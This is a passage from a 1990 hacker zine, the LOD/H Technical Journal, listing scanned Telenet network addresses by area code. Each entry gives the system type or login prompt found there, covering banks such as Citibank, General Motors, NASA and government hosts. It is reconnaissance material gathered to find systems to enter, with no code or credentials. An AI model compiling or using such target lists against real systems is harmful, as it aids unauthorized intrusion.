$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
17 Teleview
20 US Sprint
21 Teleview
* 22
42 DNA Online
* 48
* 53
60 HP-3000
$ 62 PRIME TRUSWL
* 65
71 PRIME UCCC
76 CYBER PCC
77 PRIME UCCC
94a
$ 117 PC Pursuit Dialer (300)
$ 118 PC Pursuit Dialer (1200)
120
131 HP-3000
152 HP-3000
156 HP-3000
* 157
159a C@
160a C@
168 HP-3000
169 HP-3000
176a PRIME UCCC
177 HL053-TRAN
231
233
236a
240 VAX HQAAFES
242 TACL 1>
* 250
* 252
* 253
* 254
* 255
* 256
* 257
* 258
* 259
* 261
* 262
* 263
* 264
* 265
* 266
* 267
* 268
* 269
* 270
* 279
341 PRIME BNW
342 PRIME GCAD..
* 373
* 530
* 531
* 532
* 533
* 534
* 535
* 536
* 537
* 538
* 539
607 HP-3000

215--PENNSYLVANIA--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5 PC Pursuit Dialer (300)
$ 22 PC Pursuit Dialer (2400)
* 30
$ 32 AOS
$ 35 IMS AMERICA
40 VU/TEXT
$ 45 IMS AMERICA
49 Telebase Systems
* 50
* 54
* 60
66 Newsnet
74
92a
$ 112 PC Pursuit Dialer (1200)
121 Towers Perrin Online
* 132
135 VU/TEXT
136 DSS::15B1
137
140 VU/TEXT
$ 148 Weston's Computer Center
$ 156 Telenet Async to 3270
$ 157a Telener Async to 3270
$ 234
235 HP-3000
262 Data Mail
264 ?
265 "
266 "
267 "
268 "
269 PRIME
* 350
* 360
$ 361 HP-3000

216--OHIO--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 30 MRI CICS H0C3
* 31
$ 32 MRI CICS H0C3
$ 34 PRIME SH.US
$ 35
* 51
* 55
* 57
* 59
$ 60 MHP201A
66 Newsnet
$ 74 HP-3000
109a
* 115
$ 120 PC Pursuit Dialer (2400)
* 125
* 134
* 135
* 138
$ 144 U#=
163
* 178

217--ILLINIOS--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
25 UNIX University of Illinois
26 UNIX University of Illinois
$ 35 VAX NCSA VMSA
$ 39 ID
$ 40
$ 41 PRIME SPRFLD

218--MINNESOTA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 38 AOS
$ 39 AOS
* 40
$ 42 AOS
$ 45 AOS
$ 56 AOS
$ 142 AOS
$ 157 AOS

219--INDIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
4 PRIME NODE.1
5 PRIME NODE.2
6 PRIME NODE.4
7 PRIME NODE.5
8 PRIME NODE.8
9 N1127p3 ENTER GROUP NAME>
10 Lincoln National Corp.
* 50

222--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
100 PRIME
301a C@
401a C@

223--CITIBANK--ADDRESSES SCANNED: 0-300/1000-3000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 1
$ 2 VAX CRIS
10 PRIME
* 15
19 HP-3000
26 GS/1 IBISM Electronic Village
30 VAX Citi Treasury Products
31 INVALID FORMAT
32 enter a for astra
* 34
35 VAX Citi Treasury Products
39 HRINFO NETWORK
40 VAX Global Report
46 CICS PPD Communications Network
47 CICS PPD Connunications Network
48 Citibank NY port CBN2
49 Online Manual
50 PRIME
55 PRIME WINMIS
61 VAX Global Report
63 VAX Global Report
65 System/88
$ 68 Citimail II
70 VAX FIG ADMIN CLUSTER
71 Enter Translator Number
91 VAX
$ 92 Citinet
$ 94
$ 95 <<ENTER PASSWORD>>
$ 96 <<ENTER PASSWORD>>
97 Quotdial
98 VAX CMA1
$ 100 VAX
$ 103 <<ENTER PASSWORD>>
$ 104 VAX
175 enter a for astra
$ 176 VAX PBGNY
178 VAX Citibank VAXC
179 VAX Citibank VAXC
$ 180 Decserver
$ 181 Decserver
$ 182 Decserver
* 183
* 184
* 185
* 186
$ 187 Decserver
$ 189 Decserver
193 PRIME
$ 199 RSX-11
201 C/C/M
202 C/C/M
203 C/C/M
204 C/C/M
208 C/C/M
260 VAX
* 1000

224--CITIBANK--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
2 VAX Global Report
5
7 Citibank Test
9 VAX
13
16 PLEASE SIGN ON
17 Citibanking Hong Kong
22
24 Decserver
26 Mexico Babymail
27 Decserver
28 Decserver
36 Citibank Mexico
47 PPD Communications Network
51 "
52 Citibank Mexico
57 VAX
58 Citibank Venesuela
59 Citibank Quito
60 Citibank CBK3
61 Citibank Sidney
62 Citibank Jakarta
63 Citibank Manila
64 Citibank New Zealand
65 Citibank Singapore
66
67
68 Argentina Mail
71 ENTER TRANSACTION ID:
73 Decserver
74 CHANNEL 03/104
76 Cititrak BBS
78 Citibank Hong Kong
79 Citibank New York
81 Citibank Tokyo
82 Citibank Seoul
83 Citibank New York
84 World Corp. Group
85 Citibank Hong kong
86 Citibank Singapore
87 Decserver
88 Citibank Taipei
89 Citibank ICC
90 WANG VS BANCO INTERNAL
91 PRIME
92
93
94 IBM 3270 CSGCOPRO
97 CitiMail-Asia Pacific
98 C/C/M
100 CitiSwitch, New York
101 BMS==>
102 CitiSwitch Hong Kong
103 BRAZILMAIL
104 BMS==>
105 Type .
106 Citibank Panama
107
108 C/C/M
109 Citibank Baharain
110 Citibank Puerto Rico
111
113 Citibank London
114
115
117 Citibank Hong Kong
118 NEWNET BS
119 Decserver
121 NEWNET BS
122 VAX Global Report
125 ENTER TRANSACTION ID:
127 Citibank Jakarta
128 PRIME
129 VAX CitiTreasury Products
130 VAX "
131 Citibank New York
134
137 HP-3000
138
139 VAX I.B.F.S.
140 "
141 HP-3000
145 PRIME
150 Citibank New Jersey
151
154 PRIME
160
161 VAX FIG ADMIN
162 PRIME
163 PRIME
164 PRIME WINMIS
165 GS/1 IBISM Elctronic Village
166 VAX CitiTreasury Products
167 VAX "
168 VAX Global Report
170 Electronic Cash Manager
173 HELP Online User Manager
174 PRIME
175 enter a for astra
176 Decserver
177
178 VAX CRIS
179 Citinet
180 ENTER QUOTDIAL ID:
181 Citimail II N. America
183 PRIME
187 Decserver
188 GS/1 Cititrust WIN
190 HP-3000
191 ENTER TYPE NUMBER
192 HP-3000
193 HP-3000
196 VAX CMA1
197 HRINFO NETWORK
199 CHANNEL 08/017
200 Citibank Baharain
201 CitiMail-Asia Pacific
202 "
203 Citibank Hong Kong
204 LAGB LATINMAIL
205
207 CitiBanking SUC.MONTEVIDEO
213
217
219 Citibank Stockholm
221
222 XENIX
223 VAX Global Report
224 PRIME
229 VAX Global Report
231
501 PRIME ATG
506 IBM Citibank Hong Kong

229--GENERAL MOTORS--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
113 DCIPC
114 %@CTVVAUd@dUYECVGUIied
118 " "
137 VAX
152 VAX
171 (Channel b.h128.001)
172 " "
176 NOS
177 (Channel b.h101.001)
178 (Channel b.h128.001)
179 " "
181 USER NUMBER--
183 USER NUMBER--
184 Division:
185
187 DEC20
219 VM/370
220
226 VAX
310 PRIME
311 IUeASID@CVTTAUD@bhUcAg

301--NARYLAND--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
20 PLEASE ENTER /LOGIN
* 21
24 The Source
26 DNAMD1 Online
28 The Source
31 PRIME NUSA
33 VOS United Communications Corp
38 The Source
* 39
* 43
45 RNN/NGW
* 46
47 The Source
48 The Source
49 The Source
$ 52 PRIME
56 RNN/NGW
57 RNN/NGW
58 PRIME CDA Online Services
* 60a
* 61a
$ 63 PRIME PINET
$ 65 PRIME APHISB
74 (I)nt (D)atapac (T)elenet
* 77
* 78
100 VOS United Communications Corp
102 CYBER Arbitron
103 " "
104 " "
105 " "
106 " "
107 " "
108 " "
109 " "
110 " "
111 " "
112 " "
113 " "
114 " "
115 " "
116 " "
$ 125 VAX
132 ElHill 3
140 VAX
141 USER ID
$ 150 VAX
156 The Source
157 The Source
158 The Source
159 The Source
162 The Source
* 165
$ 167 VAX Manger Support System
$ 68 VAX
170 VOS United Communications Corp
$ 173 ID
$ 175 ID
$ 176 HP-3000
178 CYBER Arbitron
$ 243 PRIME
$ 245 PRIME
$ 246 PRIME
$ 247 PRIME
249 VAX Tamsco
301 PRIME Primecom Network
302 " " "
303 " " "
307 PRIME
330 PRIME Primecom Network
331 " " "
332 " " "
333 " " "
334 " " "
335 " " "
336 VAX
337 Dialcom MHS
341 PRIME Primecom Network
342 " " "
343 " " "
344 " " "
345 " " "
346 " " "
350 " " "
351 " " "
352 " " "
353 " " "
354 " " "
356 " " "
357 " " "
358 " " "
361 " " "
363 " " "
364 " " "
390 " " "
391 " " "
392 " " "
393 " " "
394 " " "
396 " " "
398 " " "
399 " " "
408 The Source
430 The Source
435 The Source
$ 440 INVALID-SW-CHARS
* 441
* 442
* 443
* 444
* 445
* 446
* 447
* 448
* 449
* 450
* 451
* 452
$ 453 VAX
$ 454 PRIME FRED
1001 Campus 2000
1002 Telecom Gold
1004 Telecom Gold
1017 Rev.19
1018 Telecom Gold
1040 VAX British Telecom
1041 " "
1047 " "
1049 " "
1050 " "
1051 " "
1052 " "
1053 " "
1054 " "
1055 " "
1057 " "
1058 " "
1060 UNIX Telecom Gold
1061 " "
1068 " "
1069 " "
1072 Telecom Gold
1073 "
1074 "
1075 "
1076 "
1077 "
1078 "
1079 "
1080 "
1081 "
1082 "
1083 "
1084 "
1085 "
1086 "
1087 "
1088 "
1089 "
1090 "
1200a "
2030 ID
2031 "
2032 "
2033 "

302--DELAWARE--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 31 ID
* 32
$ 41 (Tymnet clone)

303-COLORADO--ADDRESSES SCANNED: 0-500

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
7 NCAR
8 NCAR
$ 21 PC Pursuit Dialer (2400)
38 PRIME SL
$ 50 AOS
$ 52 PRIME DWRC
$ 54 AOS
$ 57 PRIME DENVER
$ 60 AOS
* 64
* 65
$ 66 AOS
$ 68 AOS
$ 69 AOS
$ 78 AOS
100 enter switch characters
$ 114 PC Pursuit Dialer (300)
$ 115 PC Pursuit Dialer (1200)
120 PRIME SAMSON
$ 130 AOS
131 Petroleum Info Network
$ 138 AOS
140 X29 Password:
$ 145 AOS
$ 146 AOS
$ 149 ID
* 152
$ 154 AOS
$ 155 AOS
$ 156 AOS
$ 157 AOS
$ 158 AOS
$ 159 AOS
$ 168 AOS
$ 169 AOS
$ 172 AOS
$ 176 AOS
$ 177 AOS
* 179
* 200
$ 231 AOS
$ 239 AOS
* 244
* 250
$ 253 AOS
* 256
$ 257 AOS
* 266
314
335 PRIME UDEN01
$ 342 HP-3000
350 VAX
$ 353 AOS
$ 354 AOS
$ 355 AOS
$ 356 AOS
$ 434 AOS
* 463
$ 470 AOS

304--WEST VIRGINIA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 AOS
$ 32 ID
* 34
* 41
100 WVNET
130 WVNET

305--FLORIDA--ADDRESSES SCANNED: 0-900

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
4 Martin Marietta
20
22 HP-3000
35 ENTER SWITCH CHARACTERS
* 51
* 52
* 56
63 HP-3000
* 67
* 68
* 69
73 HP-3000
$ 120 PC Pursuit Dialer (300)
$ 121 PC Pursuit Dialer (1200)
$ 122 PC Pursuit Dialer (2400)
129 HP-3000
* 135
136
137
138 HP-3000
140
148 VAX
156 VAX EVF
159 VU/TEXT
* 235
* 236
239 VM/370
$ 240 HP-3000
248 VAX
255 VAX
* 262
* 263
$ 268
278 PACKET/74
330a
* 337
$ 338 VAX AIM
$ 345 PRIME MIAMI
* 350
* 351
* 360
* 361
365 Martin Marietta
$ 370 No access to this DTE
371 VAX (In Spanish)
* 433
570
590
623 Telenet Async to 3270
644

312--ILLINOIS--ADDRESSES SCANNED: 0-1200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 24 PC Pursuit Dialer (2400)
34 Your entry is incorrect
$ 35 VTAM/TSO
* 37
41 Your entry is incorrect
42 #
43 #
46 SYSTEM SECURITY STANDARDS
63 PEOPLE/LINK
$ 64 Purdue ISN
$ 65 COMMAND UNRECOGNIZED
70 PEOPLE/LINK
* 71
* 77
* 78
101a
108a
121 enter system id--
131 VM/370
$ 133
135 PEOPLE/LINK
142 HP-3000
$ 146 HP-3000
$ 147 ONLINE
150 Please enter SUBSCRIBERID
$ 158 HP-3000
159 Please enter SUBSCRIBERID
160 PASSWORD
161 "
162 "
163 "
$ 166 ONLINE
$ 170 VAX SKMIC4
219 enter system id--
222 PASSWORD
227 PASSWORD
$ 231 USSMSG02
233 PASSWORD
235 PASSWORD
* 245
247
* 253
* 254
$ 255 Enter host access code:
256 Please LOGIN
258 ID:
* 263
289 Baxter ASAP System
300a WANG VS SREA
301a " "
302a " "
303a " "
304a " "
305a " "
306a " "
307a " "
308a " "
309a " "
310a " "
311a " "
312a " "
313a " "
314a " "
315a " "
316a " "
317a " "
318a " "
319a " "
* 338
* 341
* 354
370 PEOPLE/LINK
373a
374 Information Resources
375 VAX Marketing Fact Book
378 Baxter ASAP System
* 391
* 392
* 394
* 395
* 397
$ 398 MHP201A
400 Baxter ASAP System
401 "
402 "
403 "
404 "
406 COMMAND UNRECOGNIZED
$ 410 PC Pursuit Dialer (300)
$ 411 PC Pursuit Dialer (1200)
* 420
* 421
$ 422 MHP201A
* 425
* 427
* 428
* 431
$ 434 Purdue ISN
$ 435 HP-3000
$ 439 Purdue ISN
* 442
* 469
* 475
* 476
* 477
520 R59X01 login:
521 "
522 "
523 "
524 "
525 "
526 PASSWORD
527 PASSWORD
528 PASSWORD
532 VAX OMNI
534
535
536
548
$ 571
$ 572
$ 575
$ 576
$ 577
$ 580
$ 581
$ 590
$ 591
$ 592
$ 593
$ 594
$ 595
$ 596
$ 597
583
584
586
587
588
589
655 Baxter ASAP System
740 Telenet Async to 3270
741a Telenet Async to 3270
* 759
* 761
* 762
* 763
* 764
* 766
* 767
* 768
* 769
$ 770 Telenet Async to 3270
$ 771a Telenet Async to 3270
$ 772 Telenet Async to 3270
1030 VAX First Options of Chicago
1031 VAX "
1032 VAX "
1033 VAX "
1034 VAX "
1035 VAX "
1036 VAX "
1037 VAX "
1038 VAX "
1112
1127
1130 R52XO1 login:
1131 "
1132 "
1133 "
1134 "
1135 "
1136 "
1137 "
1138 "
1139 "
1140 "
1141 "
1142 "
1143 "
1144 "

313--MICHIGAN--ADDRESSES SCANNED: 0-400

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 24 PC Pursuit Dialer (2400)
25 COMSHARE
$ 30 VAX GVN VAX CLUSTER
37 enter system id--
38 "
40 Autonet
41 Autonet
43 enter system id--
50 enter system id--
61 enter system id--
62 merit:x.25
64 Telenet Async to 3270
65a Telenet Async to 3270
68 (I)nternational (D)atapac
* 75
$ 77 ID
82 NTUSSTB5
83 "
85 enteer system id--
119 PASSWORD
120 "
145 enter your access code?
146 "
148 ENTER YOUR SUBSCRIBERID;
160 PASSWORD
161 "
162 "
164 VU/TEXT
165 enter user ID
172 "
173 VAX IPP
202 merit:x.25
210a
$ 214 PC Pursuit Dialer (300)
$ 216 PC Pursuit Dialer (1200)
* 231
233
239 UNIX GTE
* 245
249
250 HP-3000
252
255 $$50 DEVICE TYPE ID
256 "
* 257
346 ?1040
347 "

314--MISSOURI--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5 PC Pursuit Dialer (2400)
$ 20 PC Pursuit Dialer (1200)
$ 33 AOS
$ 35 AOS
$ 36 AOS
$ 37 AOS
$ 38 AOS
* 39
$ 40 AOS
$ 45 AOS
* 50
* 57
131 MDCIS
132 Type User Name
$ 157 PRIME JEFCTY
$ 179 ID
* 240
* 241
* 242
* 243
* 244
* 245
* 246
* 247
* 248
* 249
* 250
* 251
* 252
* 253

315--NEW YORK--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
20 enter system id
$ 32 COMMAND UNRECOGNIZED
$ 50 enter terminal type
$ 130 ID
134 enter system id
135 "
136 "
$ 137 GTE CAMILLUS NY
$ 149 GTE CAMILLUS NY
150 GTE CAMILLUS NY
151 "
154
155
156 5294 Controller
157a 5294 Controller

317--INDIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 ID
* 31
32 PRC ACF/VTAM
34 PRC ACF/VTAM
41

318--LOUISIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
* 57

321--SPAN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
104 NASA Packet Network
150 PRIME
$ 160 VAX NASA/MFSC
1030 VAX MIPS10
1036 VAX US GOVERNMENT VAX
1056 PRIME
2023 PRIME
3035 VAX FLYBOY
4027a ALPHA 5
* 7034
7036 LUT 3.2>
$ 7055 VAX
7064 PRIME

334--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 100 National Computer Center
$ 102 "
$ 103 Enter Terminal id?
$ 130 NARDAC
$ 131 NARDAC
* 200
$ 500
* 560

335--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 12
* 13
* 110
* 111
* 120
* 121
* 122
* 123
* 124
* 210

336--UNKNOWN--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 21 VAX USDA
$ 22 VAX "
$ 40 AOS
159 VAX
$ 165 VAX VSFCA
173 Unisys Telcom
174 "
179 "
* 180
$ 181
$ 182 FCCC
* 183
$ 185 IVeASID@CVTTAUD@bhUeAg
$ 200 AOS
$ 240 PRIME
$ 250 AOS
$ 260 AOS
* 604

337--UNKNOWN--ADDRESSES SCANNED: VARIOUS

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 10a
$ 15a
* 100
* 101
$ 110 V28048DA
$ 120 AOS
* 200
* 201
* 202
* 203

343--BURROUGHS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
190 BURROUGHS

401--RHODE ISLAND--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 42 ID
* 50
612 Modem City

402--NEBRASKA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
40 ID
* 52
55 Dynix
* 56
$ 60
64a

404--GEORGIA--ADDRESSES SCANNED: 0-300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 22 PC Pursuit Dialer (2400)
* 33
$ 36 AOS
$ 37 AOS
* 40
* 47
$ 72 ID
$ 113 PC Pursuit Dialer (300)
$ 114 PC Pursuit Dialer (1200)
$ 124
* 127
$ 128
$ 130
* 136
* 175
* 230

405--OKLAHOMA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
19
$ 20
* 32
* 33
34
45 Hertz
46 C@

406--MONTANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 32 AOS
$ 33 AOS
$ 37 AOS
$ 44 AOS
$ 45 AOS
$ 46 AOS
$ 47 AOS
$ 48 AOS
$ 51 AOS
$ 52 AOS
$ 53 AOS
$ 58 AOS
$ 61 AOS
$ 62 AOS
$ 63 AOS
$ 64 AOS
$ 65 AOS
$ 75 AOS
* 125
$ 131 AOS
$ 132 AOS
$ 133 AOS
* 140
* 142
* 145
* 148
$ 150 AOS
$ 155 AOS
$ 157 AOS
$ 158 AOS
$ 159 AOS
$ 161 AOS
$ 162 AOS
$ 163 AOS
$ 176 AOS
$ 178 AOS

408--CALIFORNIA--ADDRESSES SCANNED: 0-700

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 21 PC Pursuit Dialer (2400)
$ 38 AOS
$ 41 AOS
* 49
* 53
58a
62 TACL1>
* 76
84a
$ 110 PC Pursuit Dialer (300)
$ 111 PC Pursuit Dialer (1200)
121 HP-3000
126a
$ 133 UNIX
$ 135 SCS-SALES
* 149
154 PRIME GREGOR
$ 159 VAX
$ 174 AOS
* 175
235 Global Weather MU2
238 UNIX
$ 257 VAX MATRA DESIGN
* 260
* 261
264 Portal
* 267
* 268
* 271
274 BBB Version 20
280a
304 Call:
311 AMDAHL Network
312 CCC110A
313 AMDAHL Network
314 "
315 "
$ 342 UNIX
$ 344 VAX ANDO
346 UNIX
$ 349 PCI (Tymnet clone)
352
$ 357 PCI (Tymnet clone)
$ 358 "
$ 359 "
* 371
$ 375 PCI (Tymnet clone)
$ 376 "
$ 377 "
378 UNIX Sunlink
434 COMMAND UNRECOGNIZED
435
$ 439 PCI (Tymnet clone)
$ 440 "
$ 444 HP-3000
$ 445 VAX LAUREL
$ 457 HP-3000
$ 461 AOS
$ 462 AOS
$ 463 AOS
* 468
$ 469 AOS
* 479
* 530
* 531
* 532
$ 534 HP-3000
$ 537 HP-3000
$ 538 HP-3000
* 560
$ 561 AOS
* 562
* 563
* 564
* 565
* 566
* 567
$ 568 AOS
$ 569 AOS
* 570
* 571
* 572
* 573
* 574
$ 610 HP-3000
619 HP-3000
* 620
627 Fujitsu America

410--RCA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
0 RCA

412--PENNSYLVANIA--ADDRESSES SCANNED: 0-800

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
33 Enter Usercode:
$ 34 LORD Corporation
$ 35a Telenet Async to 3270
42 Federated Edge
43 "
47 Enter Logon
48 "
49 "
51 "
52 "
55 COMMAND UNRECOGNIZED
61
63
67 enter terminal id
* 68
79 Federated Edge
117 VAX
* 122
276 COMMAND UNRECOGNIZED
277 "
278 "
279 "
* 331
340 Mellon Bank
341 C@
342 COMMAND UNRECOGNIZED
349 *** ENTER LOGON
352 "
354 VAX
355 C@
360 VAX
430
431
671 Carnegie-Mellon MICOM-B

413--MASSACHUSETTS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 21 TW81

414--WISCONSIN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 31 AOS
$ 34 AOS
$ 36 AOS
* 38
$ 46 PRIME SYSU
49 MMISC
60 MGIC
81a
* 120
$ 131 AOS
$ 132 AOS
$ 134 AOS
$ 136 AOS
$ 137 AOS
* 151
153
189a

415--CALIFORNIA--ADDRESSES SCANNED: 0-1300

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 5 PC Pursuit Dialer (2400)
7 HP-3000
$ 11 PC Pursuit Dialer (1200)
20 Dialog
27 Stanford Data Center
29 Stnaford U. Hospital
$ 34 AOS
38 HP-3000
* 39
$ 45 PRIME CESSF
48 Dialog
49 "
53 VAX
$ 106 Telenet Async to 3270
$ 108 PC Pursuit Dialer (300)
$ 109 PC Pursuit Dialer (1200)
$ 130 AOS
* 138
* 139
* 142
* 143
* 144
* 145
$ 157 VAX MENLO
158 ComMail Esprit de Corp
$ 164 AOS
167 PRIME VESTEK
* 174
* 178
$ 215 PC Pursuit Dialer (300)
$ 216 PC Pursuit Dialer (1200)
$ 217 PC Pursuit Dialer (2400)
$ 224 PC Pursuit Dialer (2400)
238 GEONET
239 Telenet Async to 3270
242 VAX
* 252
269 LUT Rel 3.2>
$ 333 AOS
$ 335 AOS
338 Telenet Async to 3270
342 Dialog
343 Telenet Async to 3270
345 SBE Inc.
* 348
* 370
379 VAX
$ 431 AOS
$ 434 AOS
$ 436 AOS
$ 437 AOS
$ 438 AOS
452 Telmar Intl Network
* 460
* 468
$ 470
$ 471
$ 541 AOS
$ 542 AOS
$ 543 AOS
$ 544 AOS
$ 545 AOS
* 546
$ 547 AOS
$ 549 AOS
* 551
* 560
* 571
572 VAX
575 VAX SPRINT
576
578
672 Telenet Async to 3270
698
$ 730 AOS
$ 731 AOS
$ 732 AOS
$ 733 AOS
* 734
* 735
* 736
* 737
* 738
* 739
* 740
* 741
780
827
1030 PRIME
1036 OVL 111 44 IDLE
1037
1038
1055
1063
1200 enter switch characters
1201 "
1202 "
1205 "

419--OHIO--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 35

422--WESTINGHOUSE--ADDRESSES SCANNED: 0-1125

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
1 PRIME
2
102 ARDM1
104 HP-3000
106 GS/1
114 west pgh tcc
115 corp info service
121 AOS
126 tcc1
127 csc2
130 PRIME
132 UNIX
135 UNIX
140
141 VAX
180 MHP1201I
182 "
183 "
185 "
187 "
194 Commtex CX-80
221
222 HP-3000
223 VAX
229

424--UNKNOWN--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
100
101
102
103
104
114
115
116
122
123
129
130

==============================================================================

End of First Half of LOD/H Telenet Directory, Rev. #5
==============================================================================
The LOD/H Technical Journal, Issue #4: File #09 of 10

The Legion Of Hackers Present:
Updated: Telenet Directory
Part B: Addresses 501XXX to 919XXX
Revision #5 Last Updated: 2/10/90
(Includes Mnemonic Host Names)

Scanned and Written by:
Erik Bloodaxe

501--ARKANSAS--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 30 AOS
$ 31 AOS
* 32
* 38
$ 44 PRIME LROCK

502--KENTUCKY--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 50
* 58
* 60
* 61

503--OREGON--ADDRESSES SCANNED: 0-1000

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
$ 20 PC Pursuit Dialer (300)
$ 21 PC Pursuit Dialer (1200)
$ 30 AOS
$ 31 AOS
$ 32
$ 36 AOS
$ 37 AOS
$ 39 AOS
$ 40 AOS
* 41
$ 45 AOS
$ 46 AOS
$ 47 AOS
$ 48 AOS
$ 49 AOS
$ 52 AOS
$ 56 AOS
$ 60 AOS
$ 63 AOS
$ 68 AOS
$ 71 AOS
75 PLEASE SIGN ON
$ 76 AOS
$ 77 AOS
$ 78 AOS
120
$ 130 AOS
$ 132 AOS
$ 134 AOS
$ 136 AOS
$ 137 AOS
$ 138 AOS
$ 141 AOS
$ 142 AOS
* 143
$ 147 AOS
$ 149 AOS
$ 150 TEKTRONIX 100
$ 151 AOS
$ 152 AOS
$ 154 AOS
$ 156 AOS
* 162
$ 167 AOS
$ 168 AOS
$ 169 AOS
$ 170 AOS
$ 174 AOS
$ 177 AOS
$ 200 AOS
* 228
* 229
$ 230 AOS
* 232
* 237
$ 238 AOS
$ 239 AOS
* 240
$ 241 AOS
$ 242 AOS
$ 243 ID
$ 250 AOS
$ 255 AOS
$ 274 AOS
$ 277 AOS
$ 278 AOS
$ 279 AOS
$ 330 AOS
$ 331 AOS
$ 332 AOS
$ 334 AOS
$ 335 AOS
$ 336 AOS
$ 338 AOS
$ 339 AOS
$ 340 AOS
$ 341 AOS
$ 342 AOS
$ 345 AOS
$ 349 AOS
$ 350 AOS
$ 351 AOS
$ 353 AOS
$ 355 AOS
$ 357 AOS
$ 360 AOS
$ 370 AOS
$ 371 AOS
$ 432 AOS
$ 440 AOS
613 UNIX sequent

504--LOUISIANA--ADDRESSES SCANNED: 0-200

$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
----------------------------------------------------
* 22
$ 31 ID
$ 32 AOS
$ 33 AOS
$ 34 AOS
* 38
* 44
* 116
* 117
$ 140 AOS
* 141
* 142

